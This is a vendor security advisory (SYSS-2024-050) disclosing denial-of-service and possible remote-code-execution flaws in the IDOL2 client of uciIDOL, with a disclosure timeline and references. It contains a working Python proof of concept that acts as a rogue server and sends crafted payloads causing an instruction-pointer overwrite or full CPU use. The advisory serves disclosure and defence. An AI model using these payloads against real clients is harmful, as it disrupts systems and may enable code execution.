Advisory ID:               SYSS-2024-050
Product:                   IDOL2 (uciIDOL)
Manufacturer:              UCI Software GmbH
Affected Version(s):       ≤ 2.12
Tested Version(s):         2.12
Vulnerability Type:        Improper Input Validation (CWE-20),
                           Improper Restriction of Operations within the
                           Bounds of a Memory Buffer (CWE-119)
Risk Level:                Medium
Solution Status:           Open
Manufacturer Notification: 2024-06-26
Solution Date:
Public Disclosure:         2024-08-19
CVE Reference:             CVE-2024-45166, CVE-2024-45167
Authors of Advisory:       Ludwig Stage and Manuel Stotz, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

IDOL2 is the so-called rich client application for uciIDOL and appears to
provide various functions, e.g. personnel time recording.

The manufacturer describes the product as follows (see [1]):

"The uciIDOL product family comprises modular applications for personnel
time recording and production data acquisition as well as for access
control and merchandise management. Within these main groups we offer
numerous function modules, enabling a system tailored to your needs. As
required, you can supplement these with the individually selectable
modules of idolWEB. The web-based applications offer flexibly deployable
extensions and additional options for working with the uciIDOL
applications."

Due to improper input validation, improper deserialization and improper
restriction of operations within the bounds of a memory buffer, IDOL2 is
vulnerable to denial-of-service (DoS) attacks and possibly remote code
execution.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

#!/usr/bin/env python3
import socket
from hexdump import hexdump  # third-party package: pip install hexdump

HOST = "127.0.0.1"
PORT = 2012

# Payload 1: access violation and EIP overwrite after five 'logins'
payload_crash = b"\xB0\x00\x3C\x3C\x6F\x62\x20\x63\x6C\x3D\x22\x58\x6D\x6C\x4D\x65\x73\x73\x61\x67\x65\x22\x20\x69\x64\x3D\x22\x31\x36\x39\x38\x38\x22\x3E\x3C\x70\x79\x20\x6E\x61\x3D\x22\x65\x76\x65\x6E\x74\x22\x20\x76\x61\x3D\x22\x63\x6F\x6E\x6E\x65\x63\x74\x22\x3E\x3C\x70\x79\x20\x6E\x61\x3D\x22\x6D\x61\x6E\x64\x61\x6E\x74\x22\x20\x76\x61\x3D\x22\x31\x22\x2F\x3E\x3C\x70\x79\x20\x6E\x61\x3D\x22\x68\x61\x73\x6D\x61\x6E\x64\x61\x6E\x74\x22\x20\x76\x61\x3D\x22\x31\x22\x2F\x3E\x3C\x70\x79\x20\x6E\x61\x3D\x22\x6E\x6F\x70\x77\x64\x22\x20\x76\x61\x3D\x22\x30\x22\x2F\x3E\x3C\x70\x79\x20\x6E\x61\x3D\x22\x6E\x6F\x75\x73\x65\x72\x22\x20\x76\x61\x3D\x22\x30\x22\x2F\x3E\x3C\x2F\x70\x79\x3E\x3C\x2F\x6F\x62\x3E\x20\x20\x20\x20\x45\x4F\x46"

# Payload 2: directly 100% CPU
payload_cpu = b"\xB0\x00" + b" EOF"

# The original PoC assigns both payloads to the same variable, so the
# second one (100% CPU) is the one that is actually sent.
data = payload_cpu
print("data: " + str(data))

# The PoC plays the server side: it waits for the IDOL2 client to connect
# and then sends the payload to the client.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.bind((HOST, PORT))
    s.listen()
    conn, addr = s.accept()
    with conn:
        print("Connected by", addr)
        conn.sendall(data)
        # Read a single reply (if any) and dump it, then exit.
        reply = conn.recv(1024)
        if reply:
            print(reply)
            hexdump(reply)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-06-26: Vulnerability reported to manufacturer
2024-06-26: Queries by the manufacturer about the circumstances under
            which the vulnerability was discovered
2024-06-27: Answers given to manufacturer and an offer to talk
2024-06-27: Invitation to a discussion with manufacturer
2024-07-03: Rejection of the offer to a call by the manufacturer
2024-08-12: Advisories sent to the manufacturer prior to publication
2024-08-19: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for uciIDOL
    https://uci.de/products/index.html
[2] SySS Security Advisory SYSS-2024-050
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-050.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[4] IDOL2 client download site
    https://uci.de/download/idol2-client.html
[5] IDOL2 client binary download
    http://download.uci.de/idol2/idol2Client_2_12.exe

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Ludwig Stage and Manuel Stotz of
SySS GmbH.

E-Mail: ludwig.stage@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Ludwig_Stage.asc
Key Fingerprint: C2FF F40D FC78 791E EF81 20DF 4B57 48C9 53A5 EE5E

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en